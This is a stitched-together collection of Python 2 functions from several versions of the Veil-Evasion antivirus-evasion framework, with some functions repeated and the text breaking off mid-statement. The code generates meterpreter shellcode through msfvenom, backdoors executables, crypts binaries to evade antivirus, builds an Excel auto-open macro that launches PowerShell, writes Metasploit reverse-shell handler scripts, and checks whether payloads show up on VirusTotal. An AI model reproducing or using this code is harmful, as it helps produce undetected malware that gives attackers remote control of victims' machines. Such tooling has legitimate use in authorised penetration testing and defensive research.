def generate(self):
# randomize the output file so we don't overwrite anything
randName = helpers.randomString(5) + ".exe"
outputFile = settings.TEMP_DIR + randName
# the command to invoke hyperion. TODO: windows compatibility
peCommand = "wine PEScrambler.exe -i " + self.required_options["ORIGINAL_EXE"][0] + " -o " + outputFile
print helpers.color("\n[*] Running PEScrambler on " + self.required_options["ORIGINAL_EXE"][0] + "...")
# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
p = subprocess.Popen(peCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_EVASION_PATH+"tools/pescrambler/", shell=True)
time.sleep(3)
stdout, stderr = p.communicate()
try:
# read in the output .exe from /tmp/
f = open(outputFile, 'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during PEScrambler execution:\n" + helpers.color(stdout, warning=True)
raw_input("\n[>] Press any key to return to the main menu.")
return ""
# cleanup the temporary output file. TODO: windows compatibility
p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = p.communicate()
return PayloadCode
def generate(self):
"""
Based on the options set by menu(), setCustomShellcode() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
# if the msfvenom command nor shellcode are set, revert to the
# interactive menu to set any options
if self.msfvenomCommand == "" and self.customshellcode == "":
self.menu()
# return custom specified shellcode if it was set previously
if self.customshellcode != "":
return self.customshellcode
# generate the shellcode using msfvenom
else:
print helpers.color("\n [*] Generating shellcode...")
if self.msfvenomCommand == "":
print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
return None
else:
# Stript out extra characters, new lines, etc., just leave the shellcode.
# Tim Medin's patch for non-root non-kali users
FuncShellcode = commands.getoutput(veil.METASPLOIT_PATH + self.msfvenomCommand)
FuncShellcode = FuncShellcode[82:-1]
FuncShellcode = FuncShellcode.strip()
return FuncShellcode
def generate(self):
# randomize the output file so we don't overwrite anything
randName = helpers.randomString(5) + ".exe"
outputFile = settings.TEMP_DIR + randName
if not os.path.isfile(self.required_options["ORIGINAL_EXE"][0]):
print "\nError during Hyperion execution:\nInput file does not exist"
raw_input("\n[>] Press any key to return to the main menu.")
return ""
print helpers.color("\n[*] Running Hyperion on " + self.required_options["ORIGINAL_EXE"][0] + "...")
# the command to invoke hyperion. TODO: windows compatibility
# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
p = subprocess.Popen(["wine", "hyperion.exe", self.required_options["ORIGINAL_EXE"][0], outputFile], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_EVASION_PATH+"tools/hyperion/", shell=True)
stdout, stderr = p.communicate()
try:
# read in the output .exe from /tmp/
f = open(outputFile, 'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during Hyperion execution:\n" + helpers.color(stdout, warning=True)
raw_input("\n[>] Press any key to return to the main menu.")
return ""
# cleanup the temporary output file. TODO: windows compatibility
if os.path.isfile(outputFile):
p = subprocess.Popen(["rm", outputFile], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = p.communicate()
return PayloadCode
def custShellcodeMenu(self, showTitle=True):
"""
Menu to prompt the user for a custom shellcode string.
Returns None if nothing is specified.
"""
# print out the main title to reset the interface
if showTitle:
messages.title()
print ' [?] Use msfvenom or supply custom shellcode?\n'
print ' 1 - msfvenom (default)'
print ' 2 - Custom\n'
choice = raw_input(" [>] Please enter the number of your choice: ")
# Continue to msfvenom parameters.
if choice == '2':
CustomShell = raw_input(" [>] Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
return CustomShell
elif choice != '1':
print helpers.color(" [!] WARNING: Invalid option chosen, defaulting to msfvenom!", warning=True)
return None
else:
return None
def PayloadInfo(self, payload, showTitle=True, showInfo=True):
"""
Print out information about a specified payload.
payload = the payload object to print information on
showTitle = whether to show the Veil title
showInfo = whether to show the payload information bit
"""
if showTitle:
if settings.TERMINAL_CLEAR != "false":
messages.title()
if showInfo:
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :]).split(".")[0].split("/")[1:]
)
print helpers.color(" Payload information:\n")
print "\tName:\t\t" + payloadname
print "\tLanguage:\t" + payload.language
print "\tRating:\t\t" + payload.rating
if hasattr(payload, "shellcode"):
if self.payload.shellcode.customshellcode:
print "\tShellcode:\t\tused"
# format this all nice-like
print helpers.formatLong("Description:", payload.description)
# if required options were specified, output them
if hasattr(self.payload, "required_options"):
self.PayloadOptions(self.payload)
def SetPayload(self, payloadname, options):
"""
Manually set the payload for this object with specified options.
name = the payload to set, ex: c/meter/rev_tcp
options = dictionary of required options for the payload, ex:
options['customShellcode'] = "\x00..."
options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
"""
# iterate through the set of loaded payloads, trying to find the specified payload name
for (name, payload) in self.payloads:
if payloadname.lower() == name.lower():
# set the internal payload variable
self.payload = payload
# options['customShellcode'] = "\x00..."
if 'customShellcode' in options:
self.payload.shellcode.setCustomShellcode(options['customShellcode'])
# options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
if 'required_options' in options:
for k,v in options['required_options'].items():
self.payload.required_options[k] = v
# options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
if 'msfvenom' in options:
self.payload.shellcode.SetPayload(options['msfvenom'])
# if a payload isn't found, then list available payloads and exit
if not self.payload:
print helpers.color(" [!] Invalid payload selected\n\n", warning=True)
self.ListPayloads()
sys.exit()
def generate(self, required_options=None):
"""
Based on the options set by menu(), setCustomShellcode() or SetPayload()
either returns the custom shellcode string or calls msfvenom
and returns the result.
Returns the shellcode string for this object.
"""
self.required_options = required_options
# if the msfvenom command nor shellcode are set, revert to the
# interactive menu to set any options
if self.msfvenomCommand == "" and self.customshellcode == "":
self.menu()
# return custom specified shellcode if it was set previously
if self.customshellcode != "":
return self.customshellcode
# generate the shellcode using msfvenom
else:
print helpers.color("\n [*] Generating shellcode...")
if self.msfvenomCommand == "":
print helpers.color(" [!] ERROR: msfvenom command not specified in payload!\n", warning=True)
return None
else:
# Stript out extra characters, new lines, etc., just leave the shellcode.
# Tim Medin's patch for non-root non-kali users
FuncShellcode = subprocess.check_output(settings.MSFVENOM_PATH + self.msfvenomCommand, shell=True)
# try to get the current MSF build version do we can determine how to
# parse the shellcode
# pretty sure it was this commit that changed everything-
# https://github.com/rapid7/metasploit-framework/commit/4dd60631cbc88e8e6d5322a94a492714ff83fe2f
try:
# get the latest metasploit build version
f = open(settings.METASPLOIT_PATH + "/build_rev.txt")
lines = f.readlines()
f.close()
# extract the build version/data
version = lines[0]
major,date = version.split("-")
# 2014021901 - the version build date where msfvenom shellcode changed
if int(date) < 2014021901:
# use the old way
return FuncShellcode[82:-1].strip()
else:
# new way
return FuncShellcode[22:-1].strip()
# on error, default to the new version
except:
return FuncShellcode[22:-1].strip()
def SetPayload(self, payloadname, options):
"""
Manually set the payload for this object with specified options.
name = the payload to set, ex: c/meter/rev_tcp
options = dictionary of required options for the payload, ex:
options['customShellcode'] = "\x00..."
options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
"""
# iterate through the set of loaded payloads, trying to find the specified payload name
for (name, payload) in self.payloads:
if payloadname.lower() == name.lower():
# set the internal payload variable
self.payload = payload
self.payloadname = name
# did they enter a number rather than the full payload?
elif payloadname.isdigit() and 0 < int(payloadname) <= len(self.payloads):
x = 1
for (name, pay) in self.payloads:
# if the entered number matches the payload #, use that payload
if int(payloadname) == x:
self.payload = pay
self.payloadname = name
x += 1
# if a payload isn't found, then list available payloads and exit
if self.payload:
# options['customShellcode'] = "\x00..."
if 'customShellcode' in options:
self.payload.shellcode.setCustomShellcode(options['customShellcode'])
# options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
if 'required_options' in options:
for k,v in options['required_options'].items():
self.payload.required_options[k] = v
# options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
if 'msfvenom' in options:
self.payload.shellcode.SetPayload(options['msfvenom'])
if not self.ValidatePayload(self.payload):
print " Payload: %s\n" % self.payloadname
print helpers.color("\n [!] WARNING: Not all required options filled\n", warning=True)
self.PayloadOptions(self.payload)
sys.exit()
else:
print helpers.color(" [!] Invalid payload selected\n\n", warning=True)
self.ListPayloads()
sys.exit()
def PayloadOptions(self, payload):
print helpers.color("\n Required Options:\n")
print " Name\t\t\tCurrent Value\tDescription"
print " ----\t\t\t-------------\t-----------"
# sort the dictionary by key before we output, so it looks nice
for key in sorted(self.payload.required_options.iterkeys()):
print " %s\t%s\t%s" % ('{0: <16}'.format(key), '{0: <8}'.format(payload.required_options[key][0]), payload.required_options[key][1])
print ""
def generate(self):
# Variables for path to our executable input and war output
orig_posh_batch = self.required_options["POSH_BATCH"][0]
try:
# read in the executable
with open(orig_posh_batch, 'r') as bat_file:
batch_lines = bat_file.readlines()
except IOError:
print helpers.color("\n [!] Powershell Script \"" + orig_posh_batch + "\" not found\n", warning=True)
return ""
cut = []
for line in batch_lines:
if "@echo off" not in line:
first = line.split('else')
# split on else to truncate the back half
# split on \"
cut = first[0].split('\\"', 4)
# get rid of everything before powershell
cut[0] = cut[0].split('%==x86')[1]
cut[0] = cut[0][2:]
# get rid of trailing parenthesis
cut[2] = cut[2].strip(" ")
cut[2] = cut[2][:-1]
top = "Sub Workbook_Open()\r\n"
top = top + "Dim str As String\r\n"
top = top + "Dim exec As String\r\n"
# insert '\r\n' and 'str = str +' every 48 chars after the first 54.
payL = self.formStr("str", str(cut[1]))
# double up double quotes, add the rest of the exec string
idx = cut[0].index('"')
cut[0] = cut[0][:idx] + '"' + cut[0][idx:]
cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] +"\""
execStr = self.formStr("exec", str(cut[0]))
shell = "Shell(exec)"
bottom = "End Sub\r\n\r\n"
PayloadCode = ''
PayloadCode = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n"
# Return
return PayloadCode
def CheckVT(self, interactive=True):
"""
Checks payload hashes in veil-output/hashes.txt vs VirusTotal
"""
# Command for in-menu vt-notify check against hashes within hash file
# It's only triggered if selected in menu and file isn't empty
try:
if os.stat(settings.HASH_LIST)[6] != 0:
checkVTcommand = "./vt-notify.rb -f " + settings.HASH_LIST + " -i 0"
print helpers.color("\n [*] Checking Virus Total for payload hashes...\n")
checkVTout = Popen(
checkVTcommand.split(), stdout=PIPE, cwd=settings.VEIL_EVASION_PATH + "tools/vt-notify/"
)
found = False
for line in checkVTout.stdout:
if "was found" in line:
filehash, filename = line.split()[0].split(":")
print helpers.color(" [!] File %s with hash %s found!" % (filename, filehash), warning=True)
found = True
if found == False:
print " [*] No payloads found on VirusTotal!"
raw_input("\n [>] Press any key to continue...")
else:
print helpers.color("\n [!] Hash file is empty, generate a payload first!", warning=True)
raw_input("\n [>] Press any key to continue...")
except OSError as e:
print helpers.color("\n [!] Error: hash list %s not found" % (settings.HASH_LIST), warning=True)
raw_input("\n [>] Press any key to continue...")
def title():
"""
Print the framework title, with version.
"""
os.system(veil.TERMINAL_CLEAR)
print '========================================================================='
print ' Veil | [Version]: 2.0.1'
print '========================================================================='
print ' [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion'
print '========================================================================='
print ""
if veil.OPERATING_SYSTEM != "Kali":
print helpers.color(' [!] WARNING: Official support for Kali Linux (x86) only at this time!', warning=True)
print helpers.color(' [!] WARNING: Continue at your own risk!\n', warning=True)
def title():
"""
Print the framework title, with version.
"""
logging.info('=========================================================================')
logging.info(' Veil | [Version]: 2.0 ')
logging.info('=========================================================================')
logging.info(' [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion')
logging.info('=========================================================================')
# check to make sure the current OS is supported,
# print a warning message if it's not and exit
if veil.OPERATING_SYSTEM == "Windows" or veil.OPERATING_SYSTEM == "Unsupported":
print helpers.color(' [!] ERROR: Your operating system is not currently supported...\n', warning=True)
print helpers.color(' [!] ERROR: Request your distribution at the GitHub repository...\n', warning=True)
sys.exit()
def generate(self):
if self.required_options["payload"][0] == "custom":
Shellcode = self.shellcode.generate()
raw = Shellcode.decode("string_escape")
f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
f.write(raw)
f.close()
backdoorCommand = "./backdoor.py -f " + self.required_options["orig_exe"][0] + " -o payload.exe -s user_supplied_shellcode -U " + settings.TEMP_DIR + "shellcode.raw"
else:
shellcodeChoice = ""
if self.required_options["payload"][0] == "meter_tcp":
shellcodeChoice = "reverse_tcp_stager"
elif self.required_options["payload"][0] == "meter_https":
shellcodeChoice = "meterpreter_reverse_https"
elif self.required_options["payload"][0] == "rev_shell":
shellcodeChoice = "reverse_shell_tcp"
else:
print helpers.color("\n [!] Please enter a valid payload choice.", warning=True)
raw_input("\n [>] Press any key to return to the main menu:")
return ""
# the command to invoke the backdoor factory
backdoorCommand = "./backdoor.py -f " + self.required_options["orig_exe"][0] + " -o payload.exe -s " + shellcodeChoice + " -H " + self.required_options["LHOST"][0] + " -P " + self.required_options["LPORT"][0]
print helpers.color("\n [*] Running The Backdoor Factory...")
# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
p = subprocess.Popen(backdoorCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_EVASION_PATH+"tools/backdoor/", shell=True)
stdout, stderr = p.communicate()
try:
# read in the output .exe from /tmp/
f = open(settings.VEIL_EVASION_PATH+"tools/backdoor/backdoored/payload.exe", 'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during The Backdoor Factory execution:\n" + helpers.color(stdout, warning=True)
raw_input("\n[>] Press any key to return to the main menu:")
return ""
return PayloadCode
def ListPayloads(self):
"""
Prints out available payloads in a nicely formatted way.
"""
print helpers.color("\n [*] Available Payloads:\n")
lastBase = None
x = 1
for (name, payload) in self.payloads:
parts = name.split("/")
if lastBase and parts[0] != lastBase:
print ""
lastBase = parts[0]
print "\t%s)\t%s" % (x, "{0: <24}".format(name))
x += 1
print ""
def SetPayload(self, lang, name, options):
"""
Manually set the payload for this object with specified options.
lang = the language of the payload ("python"/"c"/etc.)
name = the payload to set ("VirtualAlloc"/etc.)
options = dictionary of required options for the payload, ex:
options['customShellcode'] = "\x00..."
options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
"""
# first extract out all languages to make sure
# a language valid choice was passed
langs = list(set([payload.language for (n, payload) in self.payloads]))
if lang not in langs:
print helpers.color("\n[!] Specified language '" + lang + "' not valid\n", warning=True)
self.ListLangs()
sys.exit()
# extract out the specific payloads for this language
payloads = list(set([payload.shortname for (n, payload) in self.payloads if payload.language == lang]))
if name not in payloads:
print helpers.color("\n[!] Specified payload '"+name+"' not valid\n", warning=True)
self.ListPayloads(lang)
sys.exit()
# iterate through the set of loaded payloads, trying to match
# the language name and payload specified
for (n, payload) in self.payloads:
if payload.language == lang:
if payload.shortname == name:
# set the internal payload variable
self.payload = payload
# options['customShellcode'] = "\x00..."
if 'customShellcode' in options:
self.payload.shellcode.setCustomShellcode(options['customShellcode'])
# options['required_options'] = {"compile_to_exe" : ["Y", "Compile to an executable"], ...}
if 'required_options' in options:
for k,v in options['required_options'].items():
self.payload.required_options[k] = v
# options['msfvenom'] = ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]
if 'msfvenom' in options:
self.payload.shellcode.SetPayload(options['msfvenom'])
def ListPayloads(self, lang):
"""
Prints out the available payloads for a specific language.
lang = the language to list ("python"/"c"/etc.)
"""
print (" Available %s payloads:\n" % (helpers.color(lang)))
for (name, payload) in self.payloads:
if payload.language == lang: print "\t%s\t\t%s" % ('{0: <16}'.format(payload.shortname), payload.rating)
def arya(source):
# compile the source to a temporary .EXE path
tempExePath = supportfiles.compileToTemp("cs", source)
try:
# read in the raw binary
f = open(tempExePath, 'rb')
rawBytes = f.read()
f.close()
# build the obfuscated launcher source and return it
launcherCode = buildAryaLauncher(rawBytes)
return launcherCode
except:
print helpers.color(" [!] Couldn't read compiled .NET source file: %s"%(tempExePath), warning=True)
return ""
def ListLangs(self):
"""
Prints out all available languages of loaded paylod modules.
"""
langs = list()
for (name, payload) in self.payloads: langs.append(payload.language)
print (" Available languages:\n")
for lang in set(langs): print "\t" + helpers.color(lang)
print ""
def generate(self):
self._validateArchitecture()
PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
try:
# read in the python source
f = open(PYTHON_SOURCE, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def generate(self):
python_source = self.required_options["python_source"][0]
try:
# read in the python source
f = open(python_source, 'r')
PayloadCode = f.read()
f.close()
except IOError:
print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
return ""
# example of how to check the internal options
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
# return everything
return PayloadCode
def PayloadInfo(self, payload, showTitle=True, showInfo=True):
"""
Print out information about a specified payload.
payload = the payload object to print information on
showTitle = whether to show the Veil title
showInfo = whether to show the payload information bit
"""
if showTitle:
messages.title()
if showInfo:
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(str(str(payload.__class__)[str(payload.__class__).find("payloads"):]).split(".")[0].split("/")[1:])
print helpers.color(" Payload information:\n")
print "\tName:\t\t" + payloadname
print "\tLanguage:\t" + payload.language
print "\tRating:\t\t" + payload.rating
if hasattr(payload, 'shellcode'):
if self.payload.shellcode.customshellcode:
print "\tShellcode:\t\tused"
# format this all nice-like
print helpers.formatLong("Description:", payload.description)
# if required options were specified, output them
if hasattr(self.payload, 'required_options'):
print helpers.color("\n Required Options:\n")
print " Name\t\t\tCurrent Value\tDescription"
print " ----\t\t\t-------------\t-----------"
# sort the dictionary by key before we output, so it looks nice
for key in sorted(self.payload.required_options.iterkeys()):
print " %s\t%s\t%s" % ('{0: <16}'.format(key), '{0: <8}'.format(payload.required_options[key][0]), payload.required_options[key][1])
print ""
def generate(self):
# randomize the output file so we don't overwrite anything
randName = randomizer.randomString(5) + ".exe"
outputFile = veil.TEMP_DIR + randName
# the command to invoke hyperion. TODO: windows compatibility
hyperionCommand = "wine hyperion.exe " + self.required_options["original_exe"][0] + " " + outputFile
print helpers.color("\n[*] Running Hyperion on " + self.required_options["original_exe"][0] + "...")
# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
p = subprocess.Popen(
hyperionCommand,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=veil.VEIL_PATH + "tools/hyperion/",
shell=True,
)
stdout, stderr = p.communicate()
try:
# read in the output .exe from /tmp/
f = open(outputFile, "rb")
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during Hyperion execution:\n" + helpers.color(stdout, warning=True)
raw_input("\n[>] Press any key to return to the main menu:")
return ""
# cleanup the temporary output file. TODO: windows compatibility
p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = p.communicate()
return PayloadCode
def title():
"""
Print the framework title, with version.
"""
os.system(settings.TERMINAL_CLEAR)
print '========================================================================='
print ' Veil-Evasion | [Version]: 2.4.2'
print '========================================================================='
print ' [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework'
print '========================================================================='
print ""
if settings.OPERATING_SYSTEM != "Kali":
print helpers.color(' [!] WARNING: Official support for Kali Linux (x86) only at this time!', warning=True)
print helpers.color(' [!] WARNING: Continue at your own risk!\n', warning=True)
# check to make sure the current OS is supported,
# print a warning message if it's not and exit
if settings.OPERATING_SYSTEM == "Windows" or settings.OPERATING_SYSTEM == "Unsupported":
print helpers.color(' [!] ERROR: Your operating system is not currently supported...\n', warning=True)
print helpers.color(' [!] ERROR: Request your distribution at the GitHub repository...\n', warning=True)
sys.exit()
def title():
"""
Print the framework title, with version.
"""
os.system("clear")
print "========================================================================="
print " Veil | [Version]: 2.0"
print "========================================================================="
print " [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion"
print "========================================================================="
print ""
if veil.OPERATING_SYSTEM != "Kali":
print helpers.color(" [!] WARNING: Official support for Kali Linux (x86) only at this time!", warning=True)
print helpers.color(" [!] WARNING: Continue at your own risk!\n", warning=True)
# check to make sure the current OS is supported,
# print a warning message if it's not and exit
if veil.OPERATING_SYSTEM == "Windows" or veil.OPERATING_SYSTEM == "Unsupported":
print helpers.color(" [!] ERROR: Your operating system is not currently supported...\n", warning=True)
print helpers.color(" [!] ERROR: Request your distribution at the GitHub repository...\n", warning=True)
sys.exit()
def OutputMenu(self, payload, code, showTitle=True, interactive=True, args=None):
"""
Write a chunk of payload code to a specified ouput file base.
Also outputs a handler script if required from the options.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
OutputBaseChoice = ""
overwrite = False
# if we have arguments passed, extract out the values we want
if args:
OutputBaseChoice = args.o
overwrite = args.overwrite
# if we get .exe or ELF (with no base) code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe" or payload.extension == "war":
outputFolder = settings.PAYLOAD_COMPILED_PATH
# Check for ELF binary
elif hasattr(payload, "type") and payload.type == "ELF":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
if settings.TERMINAL_CLEAR != "false":
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
OutputBaseChoice = raw_input("\n [>] Please enter the base name for output files (default is 'payload'): ")
# ensure we get a base name and not a full path
while OutputBaseChoice != "" and "/" in OutputBaseChoice:
print helpers.color(" [!] Please provide a base name, not a path, for the output base", warning=True)
OutputBaseChoice = raw_input(
"\n [>] Please enter the base name for output files (default is 'payload'): "
)
# for invalid output base choices that are passed by arguments
else:
if "/" in OutputBaseChoice:
print helpers.color(" [!] Please provide a base name, not a path, for the output base", warning=True)
print helpers.color(" [!] Defaulting to 'payload' for output base...", warning=True)
OutputBaseChoice = "payload"
if OutputBaseChoice == "":
OutputBaseChoice = "payload"
# if we are overwriting, this is the base choice used
FinalBaseChoice = OutputBaseChoice
# if we're not overwriting output files, walk the existing and increment
if not overwrite:
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(list(set([x.split(".")[0] for x in filenames if x.split(".")[0] != ""])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT unless it is an ELF then no extension
if hasattr(payload, "type") and payload.type == "ELF":
OutputFileName = outputFolder + FinalBaseChoice + payload.extension
else:
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, "w")
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :]).split(".")[0].split("/")[1:]
)
message = "\n Language:\t\t" + helpers.color(payload.language) + "\n Payload:\t\t" + payloadname
handler = ""
if hasattr(payload, "shellcode"):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + payload.shellcode.msfvenompayload + "\n"
# extract LHOST if it's there
p = re.compile("LHOST=(.*?) ")
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LHOST " + parts[0] + "\n"
else:
# try to extract this local IP
handler += "set LHOST " + helpers.LHOST() + "\n"
# extract LPORT if it's there
p = re.compile("LPORT=(.*?) ")
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
# Removed autoscript smart migrate due to users on forum saying that migrate itself caused detection
# in an otherwise undetectable (at the time) payload
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += " " + option + " "
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, "required_options"):
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += "\n" + helpers.formatLong("Required Options:", t.strip(), frontTab=False, spacing=24)
# check if any options specify that we should build a handler out
keys = payload.required_options.keys()
# assuming if LHOST is set, we need a handler script
if "LHOST" in keys or "RHOST" in keys:
handler = "use exploit/multi/handler\n"
# do our best to determine the payload type
architecture = ""
if hasattr(payload, "architecture") and payload.architecture == "64":
architecture = "x64/"
# handle options from the backdoor factory
if "payload" in keys:
p = payload.required_options["payload"][0]
if "rev_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
elif "bind_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
elif "https" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
elif "shell" in p:
handler += "set PAYLOAD windows/%sshell_reverse_tcp\n" % architecture
else:
pass
# if not BDF, try to extract the handler type from the payload name
else:
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :])
.split(".")[0]
.split("/")[1:]
)
# pure rev_tcp stager
if "rev_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
# pure bind_tcp stager
elif "bind_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
# pure rev_https stager
elif "https" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
# pure rev_http stager
elif "http" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_http\n" % architecture
else:
pass
# grab the LHOST value
if "LHOST" in keys:
handler += "set LHOST " + payload.required_options["LHOST"][0] + "\n"
if "RHOST" in keys:
handler += "set RHOST " + payload.required_options["RHOST"][0] + "\n"
# grab the LPORT value if it was set
if "LPORT" in keys:
handler += "set LPORT " + payload.required_options["LPORT"][0] + "\n"
# grab the LURI value if it was set. ignore the / as that is the default
if "LURI" in keys and payload.required_options["LURI"][0] != "/":
handler += "set LURI " + payload.required_options["LURI"][0] + "\n"
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
message += "\n Payload File:\t\t" + OutputFileName + "\n"
# if we're generating the handler script, write it out
try:
if settings.GENERATE_HANDLER_SCRIPT.lower() == "true":
if handler != "":
handlerFileName = settings.HANDLER_PATH + FinalBaseChoice + "_handler.rc"
handlerFile = open(handlerFileName, "w")
handlerFile.write(handler)
handlerFile.close()
message += " Handler File:\t\t" + handlerFileName + "\n"
except:
# is that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
"\n [!] Internal error #1. Please run %s manually\n" % (os.path.abspath("./config/update.py")),
warning=True,
)
# print out notes if set
if hasattr(payload, "notes"):
# message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:", payload.notes, frontTab=False, spacing=24)
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, "required_options") and self.payload.language.lower() != "powershell":
if "COMPILE_TO_EXE" in self.payload.required_options:
value = self.payload.required_options["COMPILE_TO_EXE"][0].lower()[0]
if value == "y" or value == True:
# check if the --pwnstaller flag was passed
if args and args.pwnstaller:
supportfiles.supportingFiles(self.payload, OutputFileName, {"method": "pwnstaller"})
else:
# if interactive, allow the user to choose the method
if interactive:
supportfiles.supportingFiles(self.payload, OutputFileName, {})
# otherwise specify the default, pyinstaller
else:
supportfiles.supportingFiles(self.payload, OutputFileName, {"method": "pyinstaller"})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# This block of code is going to be used to SHA1 hash our compiled payloads to potentially submit the
# hash with VTNotify to detect if it's been flagged
try:
CompiledHashFile = settings.HASH_LIST
HashFile = open(CompiledHashFile, "a")
OutputFile = open(OutputFileName, "rb")
Sha1Hasher = hashlib.sha1()
Sha1Hasher.update(OutputFile.read())
SHA1Hash = Sha1Hasher.hexdigest()
OutputFile.close()
HashFile.write(SHA1Hash + ":" + FinalBaseChoice + "\n")
HashFile.close()
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
except:
# if that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
